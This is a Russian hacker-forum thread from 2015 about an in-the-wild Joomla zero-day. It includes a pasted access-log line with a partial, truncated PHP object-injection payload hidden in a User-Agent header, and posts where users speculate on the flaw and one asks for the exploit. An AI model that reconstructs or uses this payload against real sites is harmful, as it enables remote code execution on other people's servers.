Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Мировые новости. Обсуждения. (https://forum.antichat.xyz/forumdisplay.php?f=23)
-   -   Просто Joomla просто 0day (https://forum.antichat.xyz/showthread.php?t=434505)

psihoz26 15.12.2015 14:40
С 12 декабря inthewild

Больше инфы https://xakep.ru/2015/12/15/joomla-0day/

BabaDook 15.12.2015 15:13
И что он делает, нихуя не понял если честно

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]2015 Dec 12 16[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]49[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]07 clienyhidden[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]access[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]log
Src IP[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]74.3.170.33[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]CAN[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]Alberta
74.3.170.33 – –[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]Dec[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2015[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]49[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]0500[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]“GET[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]contact[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1″ 403 5322 “http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//google.com/” “}__test|O:21:\x22JDatabaseDriverMysqli\x22:3: ..
[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22fc[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]O[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22JSimplepieFactory[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]: .. {}[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x5C0[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x5C0[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x5C0disconnectHandlers[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]:{[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]:{[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]O[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22SimplePie[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]:..
{[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22sanitize[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]O[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22JDatabaseDriverMysql[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]:{}[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]:\[/COLOR][COLOR="#0000BB"]x22feed_url[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]x22[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]60[/COLOR][COLOR="#007700"]:..[/COLOR][/COLOR
это что

ZodiaX 15.12.2015 15:14
Кто нибудь ловил уже в логах?

Rebz 15.12.2015 15:14
по-моему, проще посмотреть что фиксили разработчики джумлы, чтобы понять откуда ноги растут)

BabaDook 15.12.2015 15:19
Цитата:
Сообщение от Rebz
Rebz said:

по-моему, проще посмотреть что фиксили разработчики джумлы, чтобы понять откуда ноги растут)
дай пожалуйста эксплоит

ZodiaX 15.12.2015 15:22
Я так понял не фильтруются значения user agent'a при записи сессии в базу... хотя могу ошибаться.

BabaDook 15.12.2015 15:26
Цитата:
Сообщение от ZodiaX
ZodiaX said:

Я так понял не фильтруются значения user agent'a при записи сессии в базу... хотя могу ошибаться.
ну а что там, sql или rce или ещё что-то, в каком виде менять значение итд . ничего конкректного нету

ZodiaX 15.12.2015 15:38
Цитата:
Сообщение от BabaDook
BabaDook said:

ну а что там, sql или rce или ещё что-то, в каком виде менять значение итд . ничего конкректного нету
rce, а вот самого эксплойта нету.

ps: https://github.com/rapid7/metasploit...rk/issues/6347

VY_CMa 15.12.2015 19:41
Цитата:
Сообщение от ZodiaX
ZodiaX said:

rce, а вот самого эксплойта нету.
ps:
https://github.com/rapid7/metasploit...rk/issues/6347
/threads/50600/page-16#post-3927817


Время: 00:20